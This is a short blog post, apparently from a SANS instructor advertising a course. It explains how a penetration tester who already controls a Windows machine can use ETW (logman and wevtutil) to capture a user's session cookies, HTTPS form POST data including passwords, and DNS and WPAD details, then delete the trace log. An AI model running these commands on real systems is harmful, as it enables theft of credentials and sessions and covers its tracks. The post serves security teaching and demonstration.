ETW (Event Tracing for Windows) is pretty awesome. You can do all kinds of crazy cool stuff with it. For example, imagine you’ve just exploited your target to find the CFO is using IE to browse to the companies internal ERP (Enterprise Resource Planning) system. Showing the executives that you’ve got access to the financials is a great way to demonstrate risk in terms that are understood in mahogany row. You need to steal his cookie, but it is non-persistent (memory only… not on disk), the session is SSL encrypted and it was negotiated before you got on his machine. Windows Event Tracing to the rescue. First you turn on Event tracing for the WinInet process.
logman start CookieStealer -p Microsoft-Windows-WinInet -o cookiesteal.etl -ets
Then you let you target do a little web browsing and wait for the good to show up in your new “cookiesteal.etl” event log.
After a few minutes you grab the goods!!
wevtutil qe c:tempcookiesteal.etl /lf:true /f:Text | find /i “cookie added”
And it isn’t just cookies recorded in the event logs. You can capture all the POST information that is passed back and forth including password from FORM based HTTPS sites!
wevtutil qe c:tempcookiesteal.etl /lf:true /f:Text | find /i “POST”
Or you could do some additional reconnaissance by looking at DNS requests, Proxy information, DNS Cache snooping and more.
wevtutil qe c:tempcookiesteal.etl /lf:true /f:Text | find /i “hostname”
wevtutil qe c:tempcookiesteal.etl /lf:true /f:Text | find /i “WPAD”
wevtutil qe c:tempcookiesteal.etl /lf:true /f:Text | find /i “DNS Cache”
When your done you you simply turn off your Event logging and delete your event log.
logman stop CookieStealer -ets
Join me for SANS 504 Hacker Techniques, Exploits & Incident Handling November 27th – December 2nd 2012 in lovely San Antonio Texas.
On Twitter @markbaggett